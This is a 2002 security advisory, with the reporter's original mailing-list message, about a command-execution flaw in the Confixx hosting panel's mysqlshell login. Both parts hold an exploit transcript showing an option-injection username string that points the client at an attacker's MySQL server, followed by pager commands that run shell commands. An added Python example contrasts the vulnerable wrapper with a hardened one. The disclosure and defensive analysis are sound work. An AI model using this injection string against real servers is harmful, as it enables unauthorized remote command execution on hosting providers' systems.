Confixx Service Provider Customer Management Interface May Let Remote Users Execute Arbitrary Commands on the System
SecurityTracker Alert ID: 1004852
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 26 2002
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Description: A vulnerability was reported in the Confixx web hosting management software. A remote user with knowledge of a particular password can execute arbitrary commands on the system.

It is reported that a remote user with knowledge of the 'mysqlshell-user' password (or the ability to guess it) can execute arbitrary commands on the system. The user must have access to a MySQL server (any server). According to the report, the password of the mysqlshell-user is the same for all customers.

To exploit the flaw, the remote user must add a user with the name "-e" to a MySQL server that the remote user controls, with 'PASSWORD' as the password and with read access to the table TABLE. A demonstration exploit transcript is provided:
---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the mysqlshell-user
Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------
here you have to enter the following string:
-e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1
after that you get prompted for a password, enter your PASSWORD (from the user "-e" on your mysql-server) here.
---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
...
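The transcript above shows the root cause: the string typed at the "Bitte Usernamen eingeben:" prompt is handed to the mysql client as command-line words, so a "username" containing spaces and dashes turns into extra options (-e, -h pointing at an attacker-controlled server, and --pager, which the client then runs as a shell command). The following is an added example, not Confixx's own code or the reporter's: it models a hypothetical login wrapper that interpolates the name unquoted into a shell command line, shows which option words that injects, and contrasts it with a wrapper that validates the name against a strict pattern and builds an exec-style argv. The address 192.0.2.10 is a documentation placeholder for IP_OF_YOUR_MYSQL_SERVER, and the pattern, function names and the "web1" customer name are assumptions of this example.

```python
import re
import shlex

# Constructed sample input: the "username" string from the advisory transcript,
# with 192.0.2.10 (documentation address) standing in for the attacker's server.
# The doubled backslash survives shell word-splitting as a literal "\n" for the client.
INJECTED_USERNAME = r"-e -h 192.0.2.10 TABLE --pager=\\nweb1"


def build_argv_vulnerable(username: str) -> list[str]:
    """Hypothetical model of the flawed wrapper: the untrusted name is interpolated
    unquoted into a shell command line, so whitespace splits it into several argv
    words and every word starting with '-' is interpreted by mysql as an option."""
    return shlex.split(f"mysql -u {username} -p")


def injected_option_words(argv: list[str]) -> list[str]:
    """Option words that appear where the wrapper only expected a user name:
    everything between the program name and the trailing '-p' that starts with '-'."""
    return [word for word in argv[2:-1] if word.startswith("-")]


# Assumed policy for Confixx-style customer database names (web1, web2, ...):
# lowercase letter first, then up to 15 lowercase letters, digits or underscores.
DBUSER_RE = re.compile(r"[a-z][a-z0-9_]{0,15}")


def is_valid_dbuser(username: str) -> bool:
    """Reject anything that is not a plain database user name (no whitespace,
    no leading dash, nothing a shell or option parser could reinterpret)."""
    return DBUSER_RE.fullmatch(username) is not None


def build_argv_hardened(username: str) -> list[str]:
    """Exec-style argv: each element is exactly one argument, no shell re-parses it,
    and the value of --user=NAME can never become a separate option."""
    if not is_valid_dbuser(username):
        raise ValueError("rejected database user name")
    return ["mysql", f"--user={username}", "-p"]


if __name__ == "__main__":
    argv = build_argv_vulnerable(INJECTED_USERNAME)
    print("vulnerable argv:      ", argv)
    print("injected option words:", injected_option_words(argv))
    for name in ("web1", INJECTED_USERNAME):
        print(f"{name!r}: {'accepted' if is_valid_dbuser(name) else 'rejected'}")
    print("hardened argv:        ", build_argv_hardened("web1"))
```

Validating the name only closes the option-injection path (connecting to a foreign MySQL server without any account on the attacked host). The transcript also shows that, once inside the interactive client, \P runs an arbitrary pager command as the mysqlshell uid, so any customer with a valid local database password keeps that ability; this is why the report's own solution is to delete the mysqlshell user rather than to filter input.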
Impact: A remote user can execute arbitrary shell commands on the system.
Solution: No solution was available at the time of this entry.
The author of the report indicates that you can delete the mysqlshell-user as a solution.
Vendor URL: www.yippi-yeah.com/en/p_confixx.php
Cause: Access control error
Underlying OS: Linux (Any)
Reported By: Ralf Dreibrodt <rd@mesos.de>
Message History:
None.
Source Message Contents
Date: Thu, 25 Jul 2002 13:58:56 +0200
From: Ralf Dreibrodt <rd@mesos.de>
Subject: confixx (remote access)
hi,
Information about Confixx (from http://www.confixx.de):
======================================================
Confixx is a comfortable tool to automate customer administration on
Linux-based webservers with graphic interfaces for Admin, Resellers and
End Users. Currently there are more than 4200 Confixx licenses
registered. More than 150 new licenses are added each week.
The problem:
===========
You can execute commands on a lot of Confixx boxes nearly without any account.
You need to know:
- a web hosting provider running Confixx
- the password of the mysqlshell-user
- access to _any_ mysql-server
The password of the mysqlshell-user is the same for all customers.
Normally you can't do anything with this account if you don't have access to one specific mysql-server.
I even found one big German provider which uses 123456 as password on all its servers for the mysqlshell account.
You have to add a user with the name "-e" on your mysql-server with the password PASSWORD and read access to the table TABLE.
Now you can do the following:
---------------
debian:/root# ssh -l mysqlshell SERVERNAME
mysqlshell@SERVERNAME's password: <-- enter here the password from the
mysqlshell-user
Confixx-MySQL-Login
Bitte Usernamen eingeben:
---------------
Here you have to enter the following string:
-e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1
After that you get prompted for a password; enter your PASSWORD (from the user "-e" on your mysql-server) here.
---------------
web1
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1951 to server version: 3.23.49-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> \P id;
PAGER set to id;
mysql> show tables;
uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer)
...
mysql> \P ls /;
PAGER set to ls /;
mysql> show tables;
bin dev home initrd lost+found mnt proc sbin usr www
boot etc formmail index.html lib mail opt root tmp var
...
Vendor:
======
A customer who uses Confixx informed the vendor about 20 months(!) ago.
Confixx just added the following line: export EDITOR="/bin/false";
so you can't use "edit;" at the mysql-prompt anymore and can't get an interactive shell via vi.
But you can still log in without access to the mysql-server on the attacked server, and you can still execute commands on this server.
Solution:
========
Delete the mysqlshell-user
This is the second problem I found in Confixx without searching for problems...
When I have some spare time or get paid for it, I will search for further bugs; I am sure there are more.
Thanks,
Ralf